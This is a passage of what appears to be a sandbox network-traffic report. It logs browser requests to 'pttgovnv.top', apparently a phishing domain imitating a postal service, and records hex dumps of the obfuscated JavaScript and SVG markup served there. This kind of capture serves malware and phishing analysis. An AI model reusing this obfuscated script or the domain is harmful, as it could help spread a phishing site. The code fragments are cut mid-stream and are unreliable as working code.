27 2b 5f 30 78
    Data Ascii: 457f1(0x368)+_0x1457f1(0x408)+_0x1457f1(0x3fa)+'ight=\x2212\x22\x20'+_0x1457f1(0x157))+(_0xf32050==null?void 0x0:_0xf32050[_0x1457f1(0x4ae)+'te'](_0x1457f1(0x5bc)))+(_0x1457f1(0x262)+_0x1457f1(0x4f2)+_0x1457f1(0x27d)+'ame=\x22opaci'+'ty\x22\x20values'+_0x
    2024-09-01 22:28:20 UTC1369INData Raw: 32 5c 78 32 30 6b 65 79 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 36 33 29 2b 27 5c 78 32 32 5c 78 32 30 64 75 72 3d 5c 78 32 32 31 73 5c 78 32 32 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 30 30 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 37 64 29 2b 27 74 43 6f 75 6e 74 3d 5c 78 32 32 69 6e 27 2b 27 64 65 66 69 6e 69 74 65 5c 78 32 32 2f 27 2b 27 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 27 2b 27 72 65 63 74 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 30 36 29 2b 27 6e 73 66 6f 72 6d 3d 5c 78 32 32 72 6f 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 36 61 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 65 63 29 2b 5f 30 78 31 34 35 37 66
    Data Ascii: 2\x20key'+_0x1457f1(0x663)+'\x22\x20dur=\x221s\x22'+_0x1457f1(0x600)+_0x1457f1(0x67d)+'tCount=\x22in'+'definite\x22/'+'>\x0a\x20\x20\x20\x20\x20\x20</'+'rect>\x0a\x20\x20\x20\x20'+_0x1457f1(0x206)+'nsform=\x22ro'+_0x1457f1(0x46a)+_0x1457f1(0x6ec)+_0x1457f
    2024-09-01 22:28:20 UTC1369INData Raw: 2b 5f 30 78 31 34 35 37 66 31 28 30 78 31 37 66 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 64 36 29 2b 27 5c 78 32 32 5c 78 32 30 79 3d 5c 78 32 32 32 34 5c 78 32 32 5c 78 32 30 72 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 34 65 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 33 64 29 2b 27 36 5c 78 32 32 5c 78 32 30 68 65 69 67 68 74 3d 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 39 32 29 2b 27 5c 78 32 32 27 29 2b 28 5f 30 78 66 33 32 30 35 30 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 78 30 3a 5f 30 78 66 33 32 30 35 30 5b 5f 30 78 31 34 35 37 66 31 28 30 78 34 61 65 29 2b 27 74 65 27 5d 28 5f 30 78 31 34 35 37 66 31 28 30 78 35 62 63 29 29 29 2b 28 5f 30 78 31 34 35 37 66 31 28 30 78 32 36 32 29 2b 27 5c 78 32 30 3c 61 6e 69 6d 61 74 65 5c 78 32 30 27
    Data Ascii: +_0x1457f1(0x17f)+_0x1457f1(0x6d6)+'\x22\x20y=\x2224\x22\x20r'+_0x1457f1(0x44e)+_0x1457f1(0x63d)+'6\x22\x20height='+_0x1457f1(0x692)+'\x22')+(_0xf32050==null?void 0x0:_0xf32050[_0x1457f1(0x4ae)+'te'](_0x1457f1(0x5bc)))+(_0x1457f1(0x262)+'\x20<animate\x20'
    2024-09-01 22:28:20 UTC1369INData Raw: 61 63 69 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 65 62 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 62 65 29 2b 27 54 69 6d 65 73 3d 5c 78 32 32 30 3b 31 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 34 35 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 30 30 29 2b 27 2e 30 38 33 33 33 33 33 33 33 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 34 62 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 62 38 29 2b 27 6e 74 3d 5c 78 32 32 69 6e 64 65 66 69 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 39 34 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 32 65 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 39 31 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 33 66 29 2b 27 72 6d 3d 5c 78 32 32 72 6f 74 61 74 65 27 2b 27 28 33 33 30 5c 78 32 30 35 30 5c 78 32 30 35 30 27 2b
    Data Ascii: aci'+_0x1457f1(0x5eb)+_0x1457f1(0x5be)+'Times=\x220;1'+_0x1457f1(0x245)+_0x1457f1(0x600)+'.083333333'+_0x1457f1(0x54b)+_0x1457f1(0x3b8)+'nt=\x22indefi'+_0x1457f1(0x494)+_0x1457f1(0x42e)+_0x1457f1(0x291)+_0x1457f1(0x53f)+'rm=\x22rotate'+'(330\x2050\x2050'+


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    6192.168.2.449746184.28.90.27443
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:20 UTC239OUTGET /fs/windows/config.json HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
    Range: bytes=0-2147483646
    User-Agent: Microsoft BITS/7.8
    Host: fs.microsoft.com
    2024-09-01 22:28:20 UTC515INHTTP/1.1 200 OK
    ApiVersion: Distribute 1.1
    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
    Content-Type: application/octet-stream
    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
    Server: ECAcc (lpl/EF06)
    X-CID: 11
    X-Ms-ApiVersion: Distribute 1.2
    X-Ms-Region: prod-weu-z1
    Cache-Control: public, max-age=152240
    Date: Sun, 01 Sep 2024 22:28:20 GMT
    Content-Length: 55
    Connection: close
    X-CID: 2
    2024-09-01 22:28:20 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    7192.168.2.449750104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:23 UTC532OUTGET /help/assets/77985128JxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://pttgovnv.top
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:23 UTC752INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:23 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:42 GMT
    ETag: W/"1264-18fc3d84650"
    CF-Cache-Status: HIT
    Age: 43369
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cCHmEE1Diuao8QoCQfz2sFrQvrBPCMwuG3qOVKMRRUNjyBqhM12FZxde99XEdMvMOatBDpOeOit7RuDg410TpdENqCnnUtsBxT8ouKM40WoksJg9WFVASd53e7CgsFk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b16cfaf2197c-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:23 UTC617INData Raw: 31 32 36 34 0d 0a 63 6f 6e 73 74 20 61 31 36 5f 30 78 31 61 30 61 62 31 3d 61 31 36 5f 30 78 62 33 30 39 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 63 36 32 30 32 37 2c 5f 30 78 34 63 33 35 30 33 29 7b 63 6f 6e 73 74 20 5f 30 78 34 37 32 35 31 37 3d 61 31 36 5f 30 78 62 33 30 39 2c 5f 30 78 31 38 66 32 38 38 3d 5f 30 78 63 36 32 30 32 37 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 30 61 36 34 62 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 34 62 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 33 66 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 32 64 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78
    Data Ascii: 1264const a16_0x1a0ab1=a16_0xb309;(function(_0xc62027,_0x4c3503){const _0x472517=a16_0xb309,_0x18f288=_0xc62027();while(!![]){try{const _0x10a64b=parseInt(_0x472517(0x14b))/0x1+-parseInt(_0x472517(0x13f))/0x2+parseInt(_0x472517(0x12d))/0x3+-parseInt(_0x
    2024-09-01 22:28:23 UTC1369INData Raw: 78 36 65 62 66 36 29 29 3b 63 6f 6e 73 74 20 61 31 36 5f 30 78 61 61 35 39 66 37 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 5f 30 78 34 31 30 62 64 31 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 65 35 63 30 37 2c 5f 30 78 33 31 63 63 34 35 29 7b 63 6f 6e 73 74 20 5f 30 78 35 63 32 31 65 37 3d 5f 30 78 34 31 30 62 64 31 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 61 61 36 61 36 3d 61 31 36 5f 30 78 62 33 30 39 3b 69 66 28 5f 30 78 33 31 63 63 34 35 29 7b 63 6f 6e 73 74 20 5f 30 78 32 31 66 34 32 38 3d 5f 30 78 33 31 63 63 34 35 5b 5f 30 78 33 61 61 36 61 36 28 30 78 31 32 34 29 5d 28 5f 30 78 33 65 35 63 30 37 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 31 63 63 34 35
    Data Ascii: x6ebf6));const a16_0xaa59f7=(function(){let _0x410bd1=!![];return function(_0x3e5c07,_0x31cc45){const _0x5c21e7=_0x410bd1?function(){const _0x3aa6a6=a16_0xb309;if(_0x31cc45){const _0x21f428=_0x31cc45[_0x3aa6a6(0x124)](_0x3e5c07,arguments);return _0x31cc45
    2024-09-01 22:28:23 UTC1369INData Raw: 78 31 34 61 66 66 62 2c 62 20 61 73 20 61 31 36 5f 30 78 31 39 63 39 36 38 7d 66 72 6f 6d 27 2e 2f 33 37 64 38 65 62 33 31 4a 78 4b 6e 57 2e 6a 73 27 3b 63 6f 6e 73 74 20 6f 3d 64 6f 63 75 6d 65 6e 74 5b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 35 31 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 64 29 5d 28 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 64 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 36 29 29 3b 66 75 6e 63 74 69 6f 6e 20 61 31 36 5f 30 78 62 33 30 39 28 5f 30 78 31 31 63 64 63 35 2c 5f 30 78 33 33 66 61 37 61 29 7b 63 6f 6e 73 74 20 5f 30 78 31 31 38 66 33 63 3d 61 31 36 5f 30 78 34 36 38 31 28 29 3b 72 65 74 75 72 6e 20 61 31 36 5f 30 78 62 33 30 39 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 38 63 39 37 39
    Data Ascii: x14affb,b as a16_0x19c968}from'./37d8eb31JxKnW.js';const o=document[a16_0x1a0ab1(0x151)+a16_0x1a0ab1(0x14d)](a16_0x1a0ab1(0x13d)+a16_0x1a0ab1(0x136));function a16_0xb309(_0x11cdc5,_0x33fa7a){const _0x118f3c=a16_0x4681();return a16_0xb309=function(_0x8c979
    2024-09-01 22:28:23 UTC1361INData Raw: 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 39 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 33 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 35 30 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 37 29 2b 27 6b 46 47 79 6d 2e 63 73 73 27 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 63 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 39 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 31 29 2b 27 4a 78 4b 6e 57 2e 6a 73 27 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 65 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 39 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 32 63 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 39 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31
    Data Ascii: a16_0x1a0ab1(0x149),a16_0x1a0ab1(0x133)+a16_0x1a0ab1(0x150),a16_0x1a0ab1(0x147)+'kFGym.css',a16_0x1a0ab1(0x14c)+a16_0x1a0ab1(0x149),a16_0x1a0ab1(0x131)+'JxKnW.js',a16_0x1a0ab1(0x14e)+a16_0x1a0ab1(0x149),a16_0x1a0ab1(0x12c)+a16_0x1a0ab1(0x149),a16_0x1a0ab1
    2024-09-01 22:28:23 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    8192.168.2.449748104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:23 UTC532OUTGET /help/assets/37d8eb31JxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://pttgovnv.top
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:23 UTC764INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:23 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:42 GMT
    ETag: W/"cf70-18fc3d84650"
    CF-Cache-Status: HIT
    Age: 37245
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0T779OBsKvrt94YaDyDGBvIpknjAZEs0id%2BCEn%2F%2Bdze3Bd%2BtMPGa6TaFZI6r%2B1WKdghDD1Ttfu78gL29209qYePjRMolZkKsqKbRcGG2PpYO%2F2Hd7PrZRxUK7h2p88E%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b16d1a5318bc-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:23 UTC605INData Raw: 37 63 62 34 0d 0a 63 6f 6e 73 74 20 61 39 5f 30 78 31 33 64 30 32 33 3d 61 39 5f 30 78 33 36 34 37 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 63 30 66 34 63 2c 5f 30 78 35 62 34 66 37 65 29 7b 63 6f 6e 73 74 20 5f 30 78 31 38 63 30 65 33 3d 61 39 5f 30 78 33 36 34 37 2c 5f 30 78 33 35 64 30 39 63 3d 5f 30 78 31 63 30 66 34 63 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 61 38 30 38 39 35 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 66 62 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 31 32 65 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 31 39 63 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38
    Data Ascii: 7cb4const a9_0x13d023=a9_0x3647;(function(_0x1c0f4c,_0x5b4f7e){const _0x18c0e3=a9_0x3647,_0x35d09c=_0x1c0f4c();while(!![]){try{const _0xa80895=-parseInt(_0x18c0e3(0xfb))/0x1*(parseInt(_0x18c0e3(0x12e))/0x2)+parseInt(_0x18c0e3(0x19c))/0x3+-parseInt(_0x18
    2024-09-01 22:28:23 UTC1369INData Raw: 75 73 68 27 5d 28 5f 30 78 33 35 64 30 39 63 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 39 5f 30 78 35 34 30 33 2c 30 78 35 61 36 32 36 29 29 3b 69 6d 70 6f 72 74 7b 73 20 61 73 20 61 39 5f 30 78 33 30 66 39 64 37 2c 75 20 61 73 20 61 39 5f 30 78 31 66 33 62 30 36 2c 78 20 61 73 20 61 39 5f 30 78 32 65 65 33 64 31 2c 72 20 61 73 20 61 39 5f 30 78 34 63 37 30 62 63 2c 6e 20 61 73 20 61 39 5f 30 78 38 30 33 61 35 62 2c 79 20 61 73 20 61 39 5f 30 78 33 65 36 30 61 34 2c 64 20 61 73 20 61 39 5f 30 78 32 35 35 63 63 33 2c 7a 20 61 73 20 61 39 5f 30 78 34 36 31 36 35 63 2c 41 20 61 73 20 61 39 5f 30 78 32 62 33 63 64 37 2c 61 20 61 73 20 61 39 5f 30 78 35 61 34 38 36 32 2c 77 20 61 73 20 61 39 5f 30 78 32 37 33 34 39 36 7d 66 72 6f 6d 27 2e 2f 69 6e
    Data Ascii: ush'](_0x35d09c['shift']());}}}(a9_0x5403,0x5a626));import{s as a9_0x30f9d7,u as a9_0x1f3b06,x as a9_0x2ee3d1,r as a9_0x4c70bc,n as a9_0x803a5b,y as a9_0x3e60a4,d as a9_0x255cc3,z as a9_0x46165c,A as a9_0x2b3cd7,a as a9_0x5a4862,w as a9_0x273496}from'./in
    2024-09-01 22:28:23 UTC1369INData Raw: 34 36 34 3d 5f 30 78 32 39 36 63 64 37 28 5f 30 78 35 63 62 37 36 38 29 29 2c 5f 30 78 35 34 66 38 35 64 3e 2d 30 78 31 26 26 28 5f 30 78 35 36 66 30 33 30 3d 5f 30 78 35 36 66 30 33 30 7c 7c 5f 30 78 32 33 36 64 35 35 5b 5f 30 78 34 38 39 66 32 63 28 30 78 31 31 31 29 5d 28 30 78 30 2c 5f 30 78 35 34 66 38 35 64 29 2c 5f 30 78 35 62 38 37 62 32 3d 5f 30 78 32 33 36 64 35 35 5b 27 73 6c 69 63 65 27 5d 28 5f 30 78 35 34 66 38 35 64 2c 5f 30 78 32 33 36 64 35 35 5b 5f 30 78 34 38 39 66 32 63 28 30 78 31 33 30 29 5d 29 29 2c 5f 30 78 35 36 66 30 33 30 3d 61 74 28 5f 30 78 35 36 66 30 33 30 21 3d 6e 75 6c 6c 3f 5f 30 78 35 36 66 30 33 30 3a 5f 30 78 32 33 36 64 35 35 2c 5f 30 78 35 33 61 32 36 66 29 2c 7b 27 66 75 6c 6c 50 61 74 68 27 3a 5f 30 78 35 36 66 30
    Data Ascii: 464=_0x296cd7(_0x5cb768)),_0x54f85d>-0x1&&(_0x56f030=_0x56f030||_0x236d55[_0x489f2c(0x111)](0x0,_0x54f85d),_0x5b87b2=_0x236d55['slice'](_0x54f85d,_0x236d55[_0x489f2c(0x130)])),_0x56f030=at(_0x56f030!=null?_0x56f030:_0x236d55,_0x53a26f),{'fullPath':_0x56f0
    2024-09-01 22:28:23 UTC1369INData Raw: 63 66 39 37 37 29 69 66 28 21 69 74 28 5f 30 78 31 63 66 39 37 37 5b 5f 30 78 35 63 34 65 37 38 5d 2c 5f 30 78 31 30 31 34 38 63 5b 5f 30 78 35 63 34 65 37 38 5d 29 29 72 65 74 75 72 6e 21 30 78 31 3b 72 65 74 75 72 6e 21 30 78 30 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 39 5f 30 78 35 34 30 33 28 29 7b 63 6f 6e 73 74 20 5f 30 78 34 30 33 66 64 33 3d 5b 27 6d 65 73 73 61 67 65 27 2c 27 61 63 6b 73 27 2c 27 6c 69 73 74 65 6e 27 2c 27 69 6e 63 6c 75 64 65 73 27 2c 27 43 6c 61 73 73 27 2c 27 32 35 32 34 39 32 33 67 46 79 50 65 41 27 2c 27 62 69 6e 64 27 2c 27 73 68 69 66 74 4b 65 79 27 2c 27 65 72 74 69 65 73 27 2c 27 73 74 61 74 65 27 2c 27 63 75 72 72 65 6e 74 54 61 72 27 2c 27 70 6f 73 69 74 69 6f 6e 27 2c 27 62 65 66 6f 72 65 52 6f 75 74 27 2c 27 2e 5c 78 32
    Data Ascii: cf977)if(!it(_0x1cf977[_0x5c4e78],_0x10148c[_0x5c4e78]))return!0x1;return!0x0;}function a9_0x5403(){const _0x403fd3=['message','acks','listen','includes','Class','2524923gFyPeA','bind','shiftKey','erties','state','currentTar','position','beforeRout','.\x2
    2024-09-01 22:28:23 UTC1369INData Raw: 63 6f 6d 70 6f 6e 65 6e 74 73 27 2c 27 74 68 5c 78 32 30 5c 78 32 32 27 2c 27 28 3f 3a 2f 7c 24 29 27 2c 27 73 65 61 72 63 68 27 2c 27 24 72 6f 75 74 65 27 2c 27 65 73 6f 6c 76 65 5c 78 32 30 63 6f 6d 27 2c 27 5c 78 32 32 5c 78 32 30 28 27 2c 27 6c 69 73 74 27 2c 27 74 6f 72 27 2c 27 73 70 6c 69 63 65 27 2c 27 61 6c 69 61 73 27 2c 27 69 6e 73 74 61 6e 63 65 73 27 2c 27 66 75 6e 63 74 69 6f 6e 27 2c 27 6f 72 61 74 69 6f 6e 27 2c 27 75 6e 73 68 69 66 74 27 2c 27 5b 5e 2f 5d 2b 3f 27 2c 27 64 75 70 6c 69 63 61 74 65 64 27 2c 27 6e 61 76 69 67 61 74 65 27 2c 27 73 70 6c 69 74 27 2c 27 69 73 45 78 61 63 74 41 63 74 27 2c 27 6d 61 6e 75 61 6c 27 2c 27 65 6e 74 65 72 43 61 6c 6c 62 27 2c 27 5f 5f 76 63 63 4f 70 74 73 27 2c 27 73 69 7a 65 27 2c 27 61 75 6c 74 27
    Data Ascii: components','th\x20\x22','(?:/|$)','search','$route','esolve\x20com','\x22\x20(','list','tor','splice','alias','instances','function','oration','unshift','[^/]+?','duplicated','navigate','split','isExactAct','manual','enterCallb','__vccOpts','size','ault'
    2024-09-01 22:28:23 UTC1369INData Raw: 33 64 30 32 33 3b 72 65 74 75 72 6e 20 4e 28 5f 30 78 34 31 39 33 33 61 29 3f 5f 30 78 34 35 61 65 61 34 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 33 30 29 5d 3d 3d 3d 5f 30 78 34 31 39 33 33 61 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 33 30 29 5d 26 26 5f 30 78 34 35 61 65 61 34 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 39 32 29 5d 28 28 5f 30 78 31 63 64 36 66 63 2c 5f 30 78 31 61 32 35 64 37 29 3d 3e 5f 30 78 31 63 64 36 66 63 3d 3d 3d 5f 30 78 34 31 39 33 33 61 5b 5f 30 78 31 61 32 35 64 37 5d 29 3a 5f 30 78 34 35 61 65 61 34 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 33 30 29 5d 3d 3d 3d 30 78 31 26 26 5f 30 78 34 35 61 65 61 34 5b 30 78 30 5d 3d 3d 3d 5f 30 78 34 31 39 33 33 61 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 74 28 5f 30 78 33 35 37 62 30 30 2c
    Data Ascii: 3d023;return N(_0x41933a)?_0x45aea4[_0x136d46(0x130)]===_0x41933a[_0x136d46(0x130)]&&_0x45aea4[_0x136d46(0x192)]((_0x1cd6fc,_0x1a25d7)=>_0x1cd6fc===_0x41933a[_0x1a25d7]):_0x45aea4[_0x136d46(0x130)]===0x1&&_0x45aea4[0x0]===_0x41933a;}function at(_0x357b00,
    2024-09-01 22:28:23 UTC1369INData Raw: 61 62 38 37 31 28 30 78 31 63 39 29 2b 27 72 27 5d 28 5f 30 78 61 35 61 32 66 37 29 5b 5f 30 78 35 61 62 38 37 31 28 30 78 31 35 33 29 5d 28 27 28 28 28 2e 2b 29 2b 29 2b 29 27 2b 27 2b 24 27 29 3b 7d 29 3b 5f 30 78 61 35 61 32 66 37 28 29 2c 28 5f 30 78 31 36 37 66 39 33 5b 27 70 6f 70 27 5d 3d 5f 30 78 36 34 66 35 36 64 28 30 78 31 37 66 29 2c 5f 30 78 31 36 37 66 39 33 5b 5f 30 78 36 34 66 35 36 64 28 30 78 31 37 35 29 5d 3d 27 70 75 73 68 27 29 3b 7d 28 59 7c 7c 28 59 3d 7b 7d 29 29 29 3b 76 61 72 20 5a 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 31 61 33 64 63 29 7b 63 6f 6e 73 74 20 5f 30 78 62 37 31 61 39 36 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 5f 30 78 32 31 61 33 64 63 5b 5f 30 78 62 37 31 61 39 36 28 30 78 31 39 34 29 5d 3d 5f 30 78 62 37 31
    Data Ascii: ab871(0x1c9)+'r'](_0xa5a2f7)[_0x5ab871(0x153)]('(((.+)+)+)'+'+$');});_0xa5a2f7(),(_0x167f93['pop']=_0x64f56d(0x17f),_0x167f93[_0x64f56d(0x175)]='push');}(Y||(Y={})));var Z;(function(_0x21a3dc){const _0xb71a96=a9_0x13d023;_0x21a3dc[_0xb71a96(0x194)]=_0xb71
    2024-09-01 22:28:23 UTC1369INData Raw: 78 35 35 62 64 61 32 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 6c 65 74 20 5f 30 78 34 31 35 62 65 32 3b 69 66 28 27 65 6c 27 69 6e 20 5f 30 78 34 37 35 34 65 34 29 7b 63 6f 6e 73 74 20 5f 30 78 34 35 39 39 62 62 3d 5f 30 78 34 37 35 34 65 34 5b 27 65 6c 27 5d 2c 5f 30 78 32 34 38 36 36 64 3d 74 79 70 65 6f 66 20 5f 30 78 34 35 39 39 62 62 3d 3d 5f 30 78 35 35 62 64 61 32 28 30 78 31 33 38 29 26 26 5f 30 78 34 35 39 39 62 62 5b 5f 30 78 35 35 62 64 61 32 28 30 78 66 30 29 5d 28 27 23 27 29 2c 5f 30 78 33 61 39 30 37 39 3d 74 79 70 65 6f 66 20 5f 30 78 34 35 39 39 62 62 3d 3d 27 73 74 72 69 6e 67 27 3f 5f 30 78 32 34 38 36 36 64 3f 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 35 62 64 61 32 28 30 78 31 34 65 29 2b 5f 30 78 35 35 62 64 61 32 28 30 78 31 31 63 29 5d
    Data Ascii: x55bda2=a9_0x13d023;let _0x415be2;if('el'in _0x4754e4){const _0x4599bb=_0x4754e4['el'],_0x24866d=typeof _0x4599bb==_0x55bda2(0x138)&&_0x4599bb[_0x55bda2(0xf0)]('#'),_0x3a9079=typeof _0x4599bb=='string'?_0x24866d?document[_0x55bda2(0x14e)+_0x55bda2(0x11c)]
    2024-09-01 22:28:23 UTC1369INData Raw: 27 73 70 6c 69 63 65 27 5d 28 5f 30 78 33 62 34 62 30 37 29 2c 5f 30 78 35 35 31 39 38 38 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 38 39 30 65 38 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 63 38 34 62 34 28 5f 30 78 32 66 63 32 31 66 2c 5f 30 78 32 35 64 62 61 64 2c 7b 64 69 72 65 63 74 69 6f 6e 3a 5f 30 78 35 64 64 30 30 38 2c 64 65 6c 74 61 3a 5f 30 78 33 66 35 33 31 34 7d 29 7b 63 6f 6e 73 74 20 5f 30 78 35 62 31 32 66 35 3d 61 39 5f 30 78 33 36 34 37 2c 5f 30 78 33 61 63 33 65 62 3d 7b 27 64 69 72 65 63 74 69 6f 6e 27 3a 5f 30 78 35 64 64 30 30 38 2c 27 64 65 6c 74 61 27 3a 5f 30 78 33 66 35 33 31 34 2c 27 74 79 70 65 27 3a 59 5b 5f 30 78 35 62 31 32 66 35 28 30 78 